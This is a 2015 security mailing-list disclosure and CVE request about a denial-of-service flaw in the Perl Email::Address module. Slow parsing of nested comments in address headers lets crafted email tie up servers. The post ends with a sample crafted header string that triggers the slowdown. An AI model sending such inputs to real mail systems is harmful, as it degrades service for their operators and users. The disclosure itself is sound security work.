Date: Sun, 27 Sep 2015 09:53:59 +0200 From: Pali Rohár <pali.rohar@...il.com> To: oss-security@...ts.openwall.com Subject: DoS attack through Email-Address perl module v1.907 (CVE id request) Hello! I discovered possible DoS attack in any software which uses Email::Address perl module for parsing string input to list of email addresses. By default Email::Address module, version v1.907 (and all before) try to understand nestable comments in input string with deep level 2. Parsing nestable comments is for specially prepared inputs too slow and can cause high CPU load, freezing application and Denial of Service. Because input string for Email::Address module comes from external source (e.g. from email sent by attacker) it is security problem all software application which parse email messages by Email::Address perl module. For example: RT: Request Tracker, CiderWebmail, ... In new version v1.908 of Email::Address module, released at Sep 19 was set default value of nestable comments to deep level 1. This is not proper fix, just workaround for pathological inputs with nestable comments. Probably nobody has normal usage for inserting nested comments into email address in To:/Cc: headers... https://metacpan.org/release/RJBS/Email-Address-1.908 https://github.com/rjbs/Email-Address/commit/3056b7d Can you assign CVE id for this problem? In attachment I'm sending example perl script which uses Email::Address module for parsing From header and example input. On my machine that script runs 5 seconds and it parse just four addresses. Imagine that attacker send email with Cc: header with 10 times more addresses and Email::Address module effectively DoS server where is that parser running... -- Pali Rohár pali.rohar@...il.com \(¯¯`·.¥«P®ÎÑç€ØfTh€ÐÅ®K»¥.·`¯¯\) <email@...mple.com>, "(> \" \" <) ( ='o'= ) (\")___(\") sWeEtAnGeLtHePrInCeSsOfThEsKy" <email2@...mple.com>, "(i)cRiStIaN(i)" <email3@...mple.com>, "(S)MaNu_vuOLeAmMazZaReNimOe(*)MiAo(@)" <email4@...mple.com> [ CONTENT OF TYPE application/x-perl SKIPPED ] [ CONTENT OF TYPE application/pgp-signature SKIPPED ]
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Powered by Openwall GNU/*/Linux - Powered by OpenVZ